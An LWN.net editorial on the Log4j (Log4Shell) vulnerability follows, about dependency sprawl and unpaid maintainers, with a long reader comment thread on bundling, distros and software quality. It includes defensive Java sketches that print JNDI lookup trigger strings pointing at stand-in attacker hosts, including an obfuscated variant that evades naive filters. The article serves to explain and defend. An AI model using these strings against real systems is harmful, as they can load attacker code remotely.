Lessons from Log4j
What went wrong
There are a lot of articles describing the mechanics of this bug and how to exploit it in great detail; see this page for an extensive collection. In short: Log4j™ is a Java logging package trademarked and distributed by the Apache Software Foundation. It has found its way into many other projects and can be found all over the Internet. Indeed, according to this article, Log4j has been downloaded over 28 million times — in the last four months — and is a dependency for nearly 7,000 other projects. So a vulnerability in Log4j is likely to become a vulnerability in many other systems that happen to use it.
As the Apache Software Foundation proudly tweeted in June, it's even on the Ingenuity helicopter on Mars.
Normally, one thinks that a logging utility should accept data of interest and reliably log it. Log4j seemingly does this, but it also does something that, arguably, no logging system should do: it actively interprets the data to be logged and acts upon it. One thing it can do is query remote servers for data and include that in the log message. For example, it can obtain and incorporate data from an LDAP server, a feature that might be useful when one wishes to add data to the log that includes information about a user's account.
It turns out, though, that the remote directory server can supply other things, including serialized Java objects that will be reconstituted and executed. That turns this feature into a way to inject code into the running application that, presumably, only wanted to log some data. To exploit this opening, an attacker needs to do two things:
- Put up a server running a suitable protocol in a place where the target system can reach it. LDAP seems to be the protocol of choice at the moment, but others are possible; a grep of LWN's logs shows attempts to use DNS as well.
- Convince the target system to log an attacker-supplied string containing the incantation that will load and execute the object from the malicious server.
The second step above is often easier than it might seem; many systems will happily log user-supplied data. The hostile string may take the form of a user name that ends up in the log; the browser's user-agent string also seems to be a popular choice. Once the target takes the bait and logs the malicious string, the game is over.
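To make the shape of the bait concrete, here is a sketch (all host names hypothetical) of the kind of string involved, and of why naive substring filtering of it is unreliable: Log4j's nested lookups let an attacker obfuscate the trigger.

```java
// Sketch with hypothetical names: the literal trigger is easy to spot,
// but Log4j's nested lookups (e.g. ${lower:j}) allow trivial obfuscation,
// so substring filtering is a stopgap rather than a fix.
public class LookupStringCheck {
    static boolean looksSuspicious(String input) {
        return input.toLowerCase().contains("${jndi:");
    }

    public static void main(String[] args) {
        String plain = "${jndi:ldap://attacker.example/a}";
        String obfuscated = "${${lower:j}ndi:ldap://attacker.example/a}";
        System.out.println(looksSuspicious(plain));       // true
        System.out.println(looksSuspicious(obfuscated));  // false: the filter is bypassed
    }
}
```

This is why the real fix is upgrading the library, not scrubbing inputs.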
This is, in other words, a case of interpreting unsanitized data supplied by the Internet, with predictable consequences; it is a failure that should have been caught in any reasonable review process. Note that the malicious strings can also be passed by front-end software to internal systems, which might then decide to log it. In other words, not being directly exposed to the Internet is not necessarily a sufficient defense for vulnerable systems. Every system using Log4j needs to be fixed, either by upgrading or by applying one of the other mitigations found in the above-linked article. Note that the initial fixes have proved to be insufficient to address all of the problems in Log4j; users will need to stay on top of the ongoing stream of updates.
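For projects that pull in Log4j through a build system, "upgrading" usually means bumping the pinned version. A sketch of what that looks like in a Maven POM, assuming the project depends on log4j-core directly; 2.17.0 was a fixed release at the time of writing, and later updates may have superseded it, so check before copying:

```xml
<!-- Sketch: pinning log4j-core to a fixed release in a Maven POM.
     2.17.0 was current when this was written; check for later updates. -->
<dependency>
  <groupId>org.apache.logging.log4j</groupId>
  <artifactId>log4j-core</artifactId>
  <version>2.17.0</version>
</dependency>
```

Projects that only pull Log4j in transitively would need a `<dependencyManagement>` override instead, since a direct `<dependency>` entry does not force the version used by other dependencies.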
The reaction to this vulnerability has been swift and strong. Some commenters are asserting that "open source is broken". Anybody who hadn't seen xkcd #2347 before has probably encountered it by now. Has our community failed as badly as some would have it? In short, there would appear to be two broad shortcomings highlighted by this episode, relating to dependencies and maintainers.
Dependencies galore
In the early days of free software, there simply was not much free code out there, so almost everything had to be written from scratch. At that time, thus, there were few vulnerable packages available for free download and use, so every project had to code up its own security bugs. The community rose to the challenge and, even in those more innocent days, security problems were in anything but short supply.
For as long as your editor has been in this field — rather longer than he cares to admit — developers and academics both have talked about the benefits of reusable software. Over the years, that dream has certainly been accomplished. Many language communities have accumulated a massive collection of modules for many common (and uncommon) tasks; writing a program often just becomes an exercise in finding the right modules and gluing them together correctly. Interfaces to repositories automate the process of fetching the necessary modules (and the modules they depend on). For those of us who, long ago, became used to the seemingly infinite loop of running configure then tracking down the next missing dependency, modern environments seem almost unfair. The challenge is gone.
This is a huge success for our community; we have created development environments that can be a joy to work within, and which allow us to work at a level of productivity that couldn't really be imagined some decades ago. There is a problem lurking here, though: this structure makes it easy for a project to accumulate dependencies on outside modules, each of which may bring some risks of its own. When you are, essentially, importing random code off the Internet into your own program, any of a number of things can happen. One of those modules could be overtly hostile (as happened with event-stream), it could simply vanish (left-pad), or it could just suffer from neglect, as appears to have happened with Log4j.
When the quality of the things one consumes is of concern, one tends to fall back to known brands. Log4j is developed under the Apache Software Foundation brand which, one might hope, would be an indicator of quality and active maintenance. Appearances can be deceiving, though; one need not look further than Apache OpenOffice, which continues to be downloaded and used despite having been almost entirely starved of development effort for years, for an example. OpenOffice users will be relieved to know, though, that (according to the project's October 2021 report) OpenOffice has finally managed to put together a new draft mission statement. Log4j is a bit more active than that, but it still depends on the free-time effort of unpaid maintainers. Apache brand or not, this project, which is widely depended on, has nobody paid to maintain it.
But, even if the brand signals were more reliable, the problem remains that it is hard to stay on top of hundreds of dependencies. A library that appeared solid and well maintained when it was adopted can look rather less appealing a year or two later, but projects lacking good maintenance often tend not to attract attention until something goes badly wrong. Users of such a project may not understand the increasing level of risk until it is too late. Our tooling makes adding dependencies easy (to the point that we may not even be aware of them); it is less helpful when it comes to assessing the maintenance state of our existing dependencies.
Maintainers
A related problem is lack of development and maintenance support for projects that are heavily depended on. The old comparison between free software and a free puppy remains on point; puppies are wonderful, but if somebody isn't paying attention they will surely pee on the carpet and chew up your shoes. It is easy to take advantage of the free-of-charge nature of free software to incorporate a wealth of capable code, but every one of those dependencies is a puppy that needs to be under somebody's watchful eye.
As a community, we are far better at acquiring puppies than we are at training them. Companies will happily take the software that is offered, without feeling the need to contribute back even to the most crucial components in their system. Actually, we all do that; there is no way for anybody to support every project that they depend on. We all get far more out of free software than we can possibly put back into it, and that is, of course, a good thing.
That said, there is also a case to be made that the corporate side of our ecosystem is too quick to take the bounty of free software for granted. If a company is building an important product or service on a piece of free software, it behooves that company to ensure that said software is well supported and, if need be, step up to make that happen. It is the right thing to do in general, but it is far from an altruistic act; the alternative is a continual stream of Log4j-like crises. Those, as many companies are currently discovering, are expensive.
"Stepping up" means supporting maintainers as well as developers; it is with maintainers that the problem is often most acute. Even a project like the Linux kernel, which has thousands of developers who are paid for their work, struggles to find support for maintainers. Companies, it seems, see maintainership work as overhead at best, helping competitors at worst, and somebody else's problem in any case. Few companies reward their employees for acting as maintainers, so many of them end up doing that work on their own time. The result is projects with millions of downloads whose maintenance is done in somebody's free time — if it is done at all.
These problems are not specific to free software; discovering that a piece
of proprietary software is not as well supported as was claimed is far from
unheard of. Free software, at least, can be fixed even in the absence of
cooperation from its creators. But the sheer wealth of software created by
our community makes some of these problems worse; there is a massive amount
of code to maintain, and little incentive for many of its users to help
make that happen. We will presumably get a handle on these issues at some
point, but it's not entirely clear how; until that happens, we'll continue
deploying minimally supported software to Mars (and beyond).
Posted Dec 16, 2021 17:49 UTC (Thu)
by dskoll (subscriber, #1630)
[Link] (3 responses)
> OpenOffice has finally managed to put together a new draft mission statement
Burn... :)
Posted Dec 16, 2021 18:13 UTC (Thu)
by pj (subscriber, #4506)
[Link] (1 responses)
Companies see it that way because developers see it that way: most developers consider their job to be 'writing code'... but it's more than that: it's debugging, it's testing, it's ticket-status updates (be it a bug ticket or a feature 'ticket'), it's code review (really just a form of pre-emptive debugging), etc. While writing code may be the most enjoyable part of the job - who doesn't like a good dose of flow state? - it's certainly not the _entire_ job, and that message needs to be spread around more.
Posted Dec 16, 2021 21:40 UTC (Thu)
by hkario (subscriber, #94864)
[Link]
I'm sure that there are dozens upon dozens of similarly under-maintained proprietary libraries in the corporate world, but because they're closed source, nobody is looking for bugs in them, and even if a "red team" does find one, hardly anyone will learn that lack of maintenance was the root cause.
Posted Dec 16, 2021 18:21 UTC (Thu)
by rgmoore (✭ supporter ✭, #75)
[Link] (1 responses)
I just wanted to highlight this aside as an example of the kind of thing that keeps me a subscriber. The wit is very dry, but we do notice and enjoy it. Keep up the good work!
Posted Dec 21, 2021 11:00 UTC (Tue)
by fmyhr (subscriber, #14803)
[Link]
All the same, I wish our Editor could have worked in the name (and better yet, a link) to LibreOffice. The dig at OO was very much deserved, but perhaps too subtle for those unfamiliar with the situation. Which, let's face it, could be any reader -- given how large the "firehose" has become.
Posted Dec 16, 2021 19:32 UTC (Thu)
by cyperpunks (subscriber, #39406)
[Link] (8 responses)
https://twitter.com/isotopp/status/1470668771962638339
Posted Dec 16, 2021 22:41 UTC (Thu)
by noxxi (subscriber, #4994)
[Link] (4 responses)
It is not that log4j enables the code execution - it is instead the permissive design of JNDI combined with Java's powerful and known-to-be-problematic object deserialization. None of this is new - log4j just made it more accessible for exploits. It wasn't the first time that these mechanisms were found exploitable, and I doubt it will be the last.
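As a concrete illustration of one defense against that deserialization layer: since Java 9, JEP 290 serialization filters let an application allow-list the classes it expects to reconstitute and reject everything else. A minimal sketch (hypothetical class names, not taken from any real codebase):

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.ArrayList;
import java.util.Arrays;

// Sketch of a JEP 290 deserialization filter (Java 9+): an allow-list of
// expected classes, with everything else rejected. Filters like this blunt
// "reconstitute and execute" payloads, though they do not excuse
// interpreting untrusted data in the first place.
public class FilterDemo {
    static byte[] serialize(Object o) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    static Object safeDeserialize(byte[] data) throws Exception {
        // Allow java.lang and java.util classes; reject everything else.
        ObjectInputFilter filter =
            ObjectInputFilter.Config.createFilter("java.lang.*;java.util.*;!*");
        try (ObjectInputStream in =
                 new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(filter);
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        ArrayList<Integer> list = new ArrayList<>(Arrays.asList(1, 2, 3));
        System.out.println(safeDeserialize(serialize(list)));  // [1, 2, 3]
    }
}
```

Deserializing a class outside the allow-list would throw an InvalidClassException instead of instantiating it.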
Posted Dec 17, 2021 13:43 UTC (Fri)
by k3ninho (subscriber, #50375)
[Link] (1 responses)
The best response to this is to talk about user/attacker-supplied data as something you expect to be an attack vector, set the expectation that we restrict the processing of that input data to simple substitutions. Talk about the Chomsky Hierarchy, with strong warnings against Turing Completeness, so that people don't create processing of hostile data that's exploitable. If we talk about those things, the cultural expectations change so people will ask "how can this user-supplied input work against me?"
K3n.
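The "simple substitutions only" discipline above can be sketched in a few lines (hypothetical code, not from any real library): a single-pass expander that replaces known ${key} placeholders from an allow-listed map and never re-scans substituted values, so a hostile value cannot smuggle in a new lookup.

```java
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Sketch: single-pass template expansion over an allow-listed key set.
// Substituted values are inserted verbatim and never re-interpreted.
public class SafeTemplate {
    private static final Pattern PLACEHOLDER = Pattern.compile("\\$\\{([a-z]+)\\}");

    static String expand(String template, Map<String, String> values) {
        Matcher m = PLACEHOLDER.matcher(template);
        StringBuilder out = new StringBuilder();
        while (m.find()) {
            String replacement = values.getOrDefault(m.group(1), "");
            // quoteReplacement prevents the value from being treated as syntax
            m.appendReplacement(out, Matcher.quoteReplacement(replacement));
        }
        m.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        Map<String, String> vals = Map.of("user", "${jndi:ldap://evil/a}");
        // The hostile value lands in the output literally, never interpreted:
        System.out.println(expand("login by ${user}", vals));
        // prints: login by ${jndi:ldap://evil/a}
    }
}
```

Because expansion is one pass over the template only, the attacker-controlled value stays data; it never becomes a program.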
Posted Dec 18, 2021 2:21 UTC (Sat)
by ssmith32 (subscriber, #72404)
[Link]
And you do need to be running a version of the JVM/JDK (1.8, and actually a few patch versions behind the latest 1.8) that has been deprecated/unsupported for a few years now.
At least to exploit it in the fashion being described everywhere. Later versions of the JVM/JDK reportedly are still vulnerable, but you need to use in-memory gadgets, which is a bit harder than running code off an LDAP server you host.
Although I have to wonder how many attackers set up a LDAP server to host their attacks... that was running on an old version of the JVM.. that used log4j...
Posted Dec 16, 2021 20:15 UTC (Thu)
by erwaelde (subscriber, #34976)
[Link]
I'm not sure this is the whole thing. Reviewing or auditing "free (as in beer)" components from external sources is not high on (project) management's priority list. In my humble opinion this is a big part of this mess.
Posted Dec 16, 2021 20:48 UTC (Thu)
by rahulsundaram (subscriber, #21946)
[Link] (4 responses)
Far less adoption would have made a large difference.
Posted Dec 17, 2021 9:04 UTC (Fri)
by eru (subscriber, #2753)
[Link] (1 responses)
On an alternate timeline with no open source, small shared components like log4j would not exist (never mind trivialities like the infamous left-pad). Licensing them would be too much bother, so purchases would be done only for larger pieces of software. Instead, companies would use the facilities in the OS or language runtime they use, and if not sufficient, roll their own.
In general, the alternate timeline would have less, and more expensive software. Hard to say if it would be of higher quality.
Posted Dec 28, 2021 15:40 UTC (Tue)
by jd (guest, #26381)
[Link]
I found a report from 2013 which states: "Code quality for open source software continues to mirror code quality for proprietary software: For the second consecutive year, code quality for both open source and proprietary software was better than the generally accepted industry standard for good-quality software of 1.0 defect density (defects per 1,000 lines of code, a commonly used measurement of software quality). Open source software averaged a defect density of 0.69, while proprietary code (a random sampling of code developed by enterprise users) averaged 0.68."
Open Source did better, according to another report: "In fact, the most recent report (2013) found open source software written in C and C++ to have a lower defect density than proprietary code. The average defect density across projects of all sizes was 0.59 for open source, and 0.72 for proprietary software."
Yet other reports give other figures. "Defect density (defects per 1,000 lines of code) of open source code and commercial code has continued to improve since 2013: When comparing overall defect density numbers between 2013 and 2014, the defect density of both open source code and commercial code has continued to improve. Open source code defect density improved from 0.66 in 2013 to 0.61 in 2014, while commercial code defect density improved from 0.77 to 0.76."
Bear in mind that all three reports are basing their 2013 figures on the same 2013 analysis by Coverity and all three manage to give different numbers. Since the link to Coverity's report no longer works, I cannot tell you if any of them are correct.
Nonetheless, two of the three give better defect density levels to open source software, with the third being essentially equal. We can certainly use that to say that the commercial software examined certainly wasn't better and may have been worse. Of course, a lot can happen in 8 years, almost 9, and I can't find anything later than 2014.
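To put those densities in concrete terms, a small worked example (the codebase size is hypothetical; only the per-KLOC figures come from the reports quoted above):

```java
// Illustrative arithmetic only: what the quoted defect densities imply
// for a hypothetical codebase size (not data from any report).
public class DefectDensity {
    static long expectedDefects(double defectsPerKloc, int linesOfCode) {
        return Math.round(defectsPerKloc * linesOfCode / 1000.0);
    }

    public static void main(String[] args) {
        // The 2014 figures of 0.61 (open source) and 0.76 (commercial),
        // applied to a hypothetical 500,000-line codebase:
        System.out.println(expectedDefects(0.61, 500_000));  // 305
        System.out.println(expectedDefects(0.76, 500_000));  // 380
    }
}
```

Either way, hundreds of latent defects in a mid-sized codebase: the disagreement between the reports is small compared to the absolute numbers.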
So if we can't rely on tech articles, maybe we can look at methodology. Power of Ten and the CERT Guidelines for Secure Software would seem logical places to start. I do not, personally, know anyone who adheres to either and I've worked for a decent selection of companies. However, anecdotal evidence isn't worth much and it could be that everywhere else on the planet does. It may be a decent selection, but it's not really random and it's certainly not verifiable. Are there any surveys out there? Then there are rulesets like MISRA, which has fans and haters.
PRQA seems to have been seized by Perforce, and previously free-to-read coding standards now seem to be locked up, so I have no idea what they currently are. (The 2005 JSF rules are here: https://www.stroustrup.com/JSF-AV-rules.pdf - if they're as rapidly developing as Lockheed-Martin imply in one online presentation, these are well out of date.) All I can tell you with any confidence is that no open source coder, and very few professionals, have bought the Perforce suite as their software control system and are using the code analyzer to spot defects. It may be possible to use Helix QAC with Git, but I don't see anything to indicate that.
What I'm getting out of this is that the scene is messy, that a fair amount of the advice is apocryphal or at least wildly inaccurate (so a great starting point for budding galactic hitchhikers), that very few people are using the tools that do exist and that even when everything meshes just right, nobody seems to know what the results are.
I do sincerely hope that it's not as bleak as all that, but I'm worried it might actually be worse.
Posted Dec 18, 2021 10:06 UTC (Sat)
by Wol (subscriber, #4433)
[Link]
Recognise a Turing Machine for what it is - a security nightmare. And DON'T USE IT WHEN IT'S NOT APPROPRIATE.
Cheers,
Posted Dec 17, 2021 14:55 UTC (Fri)
by ebassi (subscriber, #54855)
[Link] (6 responses)
Isn't that the entire point of "open source software" as opposed to "free software"?
Posted Dec 17, 2021 17:37 UTC (Fri)
by pebolle (guest, #35204)
[Link] (3 responses)
Exactly.
Free Software proponents are, or at least should be, fine with people only consuming Free Software. I think not contributing, not funding, not reporting bugs, and so on should all be acceptable to them. Their philosophy is that all software should be free.
Open Source's philosophy is that Open Source will lead to higher quality software.
From a Free Software perspective accidents like this are not special. Its supporters like bug-free software, just like everyone else! From an Open Source perspective accidents like this are more challenging. They are at odds with their philosophy.
Posted Dec 20, 2021 23:36 UTC (Mon)
by pebolle (guest, #35204)
[Link]
Am I reading you in bad faith if I say this translates to: if you open sourced harder it wouldn't have happened?
> Compared on equal terms, open source development is superior to proprietary development
I was taught that Open Source was a reaction to Free Software. Both are alternatives to proprietary software, of course, but Open Source should be evaluated on its promise to yield better results while Free Software on its promise to yield more freedom.
(I think LWN.net almost never covers software that is Open Source but not Free Software so let's ignore that niche.)
My point was that in cases like this, where (free and open) software turns out to be buggy, the proponents of Open Source have some explaining to do. And "open source harder" explains very little, as it will always be true.
Posted Dec 21, 2021 9:40 UTC (Tue)
by drnlmza (subscriber, #60245)
[Link]
Sure, not contributing back is fine, but there's also a corresponding "no warranty" clause in most licenses. The problem is no one contributing back while everyone expects that all problems will magically be fixed without any active effort, which is not how the world works.
Posted Dec 17, 2021 19:04 UTC (Fri)
by Wol (subscriber, #4433)
[Link]
There is an obligation to contribute *forward*, but that's subtly (and critically) different.
Cheers,
Posted Dec 16, 2021 20:38 UTC (Thu)
by bkw1a (subscriber, #4101)
[Link] (36 responses)
In the Windows and Mac world there's never been good package management, so this kind of thing is inevitable. It would be great if the current crisis encourages developers in that realm to think about how that can be improved.
But even in the Linux world we're leaning more and more on snaps and flatpaks, making such problems more likely there, too. These tools are great, but we need to think about the trade-offs and be prepared to deal with the consequences.
The problem is, we don't just have one unsupervised puppy, we have 101 dalmatians.
Posted Dec 17, 2021 7:43 UTC (Fri)
by ras (subscriber, #33059)
[Link] (18 responses)
It's a Linux distribution that, afaict, is staffed mostly by sysadmins.
Some sysadmins are so anal about the "fix once, update everywhere" thing they have rules like: all software installed on my production boxes is either written in house, or is installed via a .deb with the dependencies supplied by Debian packages. Don't have a .deb - make one yourself. With ed, if necessary.
Every so often a young, wet-behind-the-ears programmer will insist to a wizened sysadmin that this bureaucracy from last fortnight is stifling his creativity, and the wizened sysadmin's eyebrows will quiver, rising above his monitor so the bristles point straight towards the young'un's eyeballs, and with a long soft sigh in his voice he will say "get off my lawn and keep that attitude away from my metal, kid".
And the kid will do just that, setting up the smoothest and slickest web site you ever did see, running completely serverless, and he will monitor everything with log4j, occasionally glancing at it with his ipady thingy while sipping coconut juice prepared by a sweet young thing in a shady spot with good 5G; and thusly and surely, his users' private data will make its way to the dark corners of the web where they make good money trading such things.
And the newspapers will have headlines demanding justice and vengeance against the nerds who had the gall to create the systems the users love to use and do it in internet time. And then after due consideration another nerd will say "why don't we do fix once update everywhere?".
Posted Dec 17, 2021 8:13 UTC (Fri)
by joib (subscriber, #8541)
[Link] (15 responses)
Perhaps distros could engage in some introspection about why developers have abandoned relying on distro packages to the extent they have, and what distros could do about it? Bonus points if you can do it without the kneejerk CADT response.
Posted Dec 17, 2021 10:04 UTC (Fri)
by LtWorf (subscriber, #124958)
[Link] (3 responses)
Nobody will follow best practices if they are not enforced.
Of course product management is happier to bundle stuff, because it leads to being faster. And developers are fine with that because they won't need to learn how to package software.
Everyone is happy until disaster happens :D
Posted Dec 18, 2021 2:30 UTC (Sat)
by ssmith32 (subscriber, #72404)
[Link] (1 responses)
People have very different ideas of best practice..
Posted Dec 18, 2021 16:30 UTC (Sat)
by LtWorf (subscriber, #124958)
[Link]
On the other hand version pinning makes sure that security fixes will never reach your product.
Posted Dec 18, 2021 11:02 UTC (Sat)
by Wol (subscriber, #4433)
[Link]
(1) Because "best practice" often isn't.
That's why greybeards do it and newbies don't ...
Cheers,
Posted Dec 17, 2021 20:40 UTC (Fri)
by khim (subscriber, #9252)
[Link] (9 responses)
But what is the reason for that phenomenon? Because bundling is the only way to create a cross-distro and cross-version binary. And that's what you want, both if you want to give your program to users (most of whom are not programmers and don't know how to compile anything) and if you want to use a program in-house and retain the ability to upgrade the OS without hassle (relying on distro-provided libraries leads to pain when installing on an upgraded OS, because certain versions of certain libraries become unavailable).
What could distros do about it? An SDK. Some way to build a binary once and use it forever. Or, if not forever, then at least for 5-10 years. That's what all OSes provide, just not Linux distributions. That's the bare minimum. If you want to make sure developers won't try to bundle libraries which are not in your base SDK, then you would also need some cross-distro and cross-version way to deliver other libraries. That's even harder; I don't know of any OS which has managed to pull that off. Flatpak is trying, AFAIK.
Posted Dec 18, 2021 11:31 UTC (Sat)
by joib (subscriber, #8541)
[Link] (1 responses)
Yes. Because insulting developers will only alienate developers further and ensures that whatever good points distros might have about maintainability and dependency management will fall on deaf ears.
> An SDK.
> Flatpak is trying, AFAIK.
Yes, something like that. Flatpak is probably the best shot in the desktop space.
In the server world, I don't know. Developers using "modern" languages really love things like cargo+crates.io/NPM/whatever, and for good reasons. The challenge is how to integrate those models with some trusted third party (call it a "distro" or whatever), that would ensure long-term maintenance and security updates for some particular versions of particular packages. Oh, and some kind of "apt-get upgrade" type mechanism to semi-automatically rebuild applications with bundled dependencies due to security updates in the dependencies.
Posted Dec 18, 2021 23:52 UTC (Sat)
by NYKevin (subscriber, #129325)
[Link]
For $DEITY's sake, even Steve Ballmer had this figured out. Remember the "Developers, developers, developers!" line? You could have the greatest operating system in the world, but it doesn't matter if nobody wants to write code for it.
Posted Dec 19, 2021 0:43 UTC (Sun)
by NYKevin (subscriber, #129325)
[Link] (6 responses)
In the proprietary world, this is a solved problem. It's called "You can't bundle it or else our lawyers will sue your pants off. Instead, every end user must download the package from upstream, which is installed in a single standard location, and if your OS/app/whatever doesn't like that standard location, then that's your problem."
Before anyone asks: New versions are handled as if they were entirely unrelated packages. You can easily end up with dozens of these "Microsoft C++ Redistributable" nonsense packages on a single Windows box.
Posted Dec 19, 2021 1:11 UTC (Sun)
by khim (subscriber, #9252)
[Link] (3 responses)
Except, of course, these runtimes not only can be bundled, they were designed to be bundled from the very early days. And yes, they sometimes needed crazy tricks to support these bundled runtimes, yet you always had the option to bundle them, and you still have that option today. They only tried to push the shared-install approach after taking 90%+ of the desktop, after they achieved, essentially, a monopoly. And even then the end result was a near disaster: that's how they lost the title of leading desktop platform to the web (ironically enough, after killing Netscape). And the web, the platform that won the title of most popular desktop platform, is, for now, all about bundling dependencies. GNU/Linux never had a monopoly, yet it tried to put much harsher requirements on developers. This flew like a lead balloon: most apps today are developed for the web or for Windows and macOS; only a tiny percentage supports Linux.
Posted Dec 19, 2021 2:57 UTC (Sun)
by NYKevin (subscriber, #129325)
[Link] (2 responses)
Sometimes, there isn't even a reasonable way to determine whether the thing is already installed or not, so you end up doing extra-crazy things like re-running the same installer over and over again (see https://help.steampowered.com/en/faqs/view/2BED-4784-8C0A...).
Posted Dec 19, 2021 14:19 UTC (Sun)
by khim (subscriber, #9252)
[Link] (1 responses)
That was always an option, not the requirement. That's why, after you wrote that, I went and verified that /MT is where it has always been, even with the just-released Visual Studio 2022.
Ah. Thanks for providing that link. Now, please go read what's written there yourself. Yes, with DirectX it's done like that. And, later, the trick was repeated with the .NET Framework. But there is an extremely important difference between what was done there and in the Linux world. Microsoft decided from the very beginning that there would be one DirectX and one .NET runtime (later they added a few more, but the original ones are all still supported). And they ensured that programs built for DirectX 1.0 (released in 1995, remember?) would still work today (there are some bugs which may prevent it, but there has been no on-purpose breakage since 1995, for a quarter-century). And only when they had that promise did they start working on legal enforcement. And yes, that combination of technical and legal solutions works.
What Linux libraries can you name which support similar technical promises? Glibc? Well, congrats: even the most super-duper-bundle-savvy apps very rarely bring their own version of glibc, even if, technically and legally, they can. The important part of the solution (outlined in the link you shared, ironically enough) was never done for glibc (there is no way to bring your own version of glibc and install it), but its glacial speed of development worked as an adequate substitute: glibc is so low-level and changes so slowly that using a five-year-old version is not too painful. Yeah, that's a rare success: of the glibc developers, not the distro makers, though. Everyone else liked to play CADT games, which made the distro makers' desire to have just one copy of each library unrealistic: where there is no compatibility between versions, there will be bundling; it's as simple as that. Yet distributors tried to fit that square peg into a round hole for decades… with very little success.
I'm also guilty: I tried to help with the creation of a local distribution years ago, got fed up with all these incompatibilities (when we tried to somehow invent a way to run apps from Red Hat on our distro) and switched back to Windows.
Posted Dec 20, 2021 18:36 UTC (Mon)
by NYKevin (subscriber, #129325)
[Link]
Side note: As someone who was actually diagnosed with AD(H)D, I really wish people would stop using my condition as a pejorative.
Or claiming that it doesn't exist, for that matter.
Posted Dec 19, 2021 13:36 UTC (Sun)
by smurf (subscriber, #17840)
[Link] (1 responses)
The Distribution approach ("there is exactly one copy of FooLib on the system which everybody uses, it gets security fixes only; if you need a newer copy you get to wait for the next distro release") may not be for everybody but at least it solves *that* problem.
Posted Dec 19, 2021 13:49 UTC (Sun)
by khim (subscriber, #9252)
[Link]
Of course there are ways to prevent that! Windows never had that problem in the first place. And Android implements a way to solve it. Not sure what macOS is doing, but I hope it either avoided the problem in the first place (like Windows) or solved it (like Android). True. If your sausage is raw and undercooked, then go and burn the whole house down. That would sure solve the issue: most likely you would have no sausage left to worry about, but if it did, by some freak chance, survive, then it would be well done.
Posted Dec 18, 2021 1:01 UTC (Sat)
by pabs (subscriber, #43278)
[Link]
Posted Dec 18, 2021 4:23 UTC (Sat)
by sionescu (subscriber, #59410)
[Link] (1 responses)
Posted Dec 19, 2021 14:28 UTC (Sun)
by khim (subscriber, #9252)
[Link]
Highly unlikely. More likely, they would be told to make sure CI/CD can run without internet access, and that would be it. The solution: take all the bazillion dependencies and put them into one repo. Then never update. You may guess how wonderfully this improves the security of the whole thing.
Posted Dec 16, 2021 21:44 UTC (Thu)
by hkario (subscriber, #94864)
[Link] (3 responses)
Posted Dec 17, 2021 20:46 UTC (Fri)
by khim (subscriber, #9252)
[Link] (2 responses)
That also makes sense. If you find a bug in a library you are using (not too serious, unlike what you have in log4j, thus without the need to rush and upgrade everything ASAP) and you fix it in the base version of the package… then it may take years before you can rely on that fix. And that is just silly: you need to ship a working program much sooner. Bundling is the obvious solution. Maybe not the best solution, although… well… what other solution is there? Bundle the version which works and use the system version if it's new enough? This leads to a combinatorial explosion very quickly and makes everything unreproducible and untestable.
Posted Dec 21, 2021 15:16 UTC (Tue)
by Chousuke (subscriber, #54562)
[Link] (1 responses)
If you vendor dependencies, you assume full responsibility for monitoring those dependencies. With a distribution, you only need to monitor what the distribution does. A security issue in a dependency provided by the distribution is not on you to find and fix.
Sure, you might be limited to using older versions of some dependencies depending on which platforms you support. That is not automatically a downside.
Your software does not need to support every platform under the sun when run in production; it's perfectly fine to tell someone that you only provide upstream production support for, e.g., RHEL 8 or newer and Ubuntu 20.04 or newer, and nothing else.
If you're an open source project, you would publish releases in source form and let distributors take care of it; maybe engaging with a few platforms that you want to explicitly support to get your software packaged.
I don't know why it seems to be so common to think that once you write software it should run on some random hyper-customized Gentoo-NixOS frankenstein of a platform just because it's "Linux".
Posted Dec 21, 2021 18:55 UTC (Tue)
by khim (subscriber, #9252)
[Link]
Who would pay for it? No. Why should you? They are bundled, they don't change, they work. Most people (including most developers) spend maybe 5 minutes a year thinking about security. 15 if you're lucky. You may not like it, but that's how it works. They cannot (and wouldn't!) pick any solution which asks them to regularly “monitor” something. Thus they bundle dependencies, since that works. As the examples of Android/DirectX/ChromeOS show, they may accept an unbundled solution where someone else monitors things. But if you say “for this solution to work, developers have to monitor XXX”… then it doesn't even matter what XXX is: developers cannot and wouldn't monitor it. Period. Not even worth discussing. They are paid to solve users' problems, not to monitor anything! What about the most common type of software, which is updated never and not supported unless something breaks and you are forced to visit a freelance site and find someone who may fix it? Why shouldn't it? Any OS is only as good as the software it enables. And the majority of software is only ever written once, updated never, and used till it breaks. Just one simple fact: there are more than 30 million businesses in the US, and the population is 330 million. Just what kind of software can a typical business afford? Think about it. The answer is: a very simple one, which requires maybe a week of work from a software developer (but it would be nice if it required less).
And then you come and say: you have to monitor that and you have to support this. How? Who would pay for that? Are you offering? For all these millions of businesses? And before you come and say that most of these businesses don't purchase any software: of course they do! They have their own [tiny] web sites with some scripts cobbled together from Google Docs and some frankenstein on a VPS. They have some scripts for Excel or Access. All that is software, too. And, the most important part: there is no hard line which separates that software from something like WhatsApp. There is a continuum of software between these hairy Excel scripts and an auto-updating browser with dozens of software engineers. And the majority of software is closer to the Excel scripts than to said browser. Even if the scripts are built on top of JavaFX in a system which uses log4j.
Posted Dec 16, 2021 22:08 UTC (Thu)
by rgmoore (✭ supporter ✭, #75)
[Link] (1 responses)
It would indeed be great if people learned this, but this isn't the first time there's been a critical security flaw with a bundled dependency. If people didn't change after the last time this happened, it requires great optimism to think they'll change this time. There are deep reasons people like bundling, and we need to work on those reasons before they'll be convinced to change.
Posted Dec 19, 2021 11:44 UTC (Sun)
by farnz (subscriber, #17727)
[Link]
This is where good systems for handling bundling come into play. For example, Fedora RPMs that include bundled packages have metadata that indicates what is bundled and at what version.
On the developer side, Rust's Cargo tool is set up so that the easy way to bundle a dependency is to document it in your build metadata and ask Cargo to copy it in. This sort of thing makes it relatively manageable to unbundle dependencies: you know what was bundled and at what version (thanks to Cargo's metadata files), and can compare that to upstream to see if there are hidden changes.
Posted Dec 17, 2021 5:38 UTC (Fri)
by bartoc (guest, #124262)
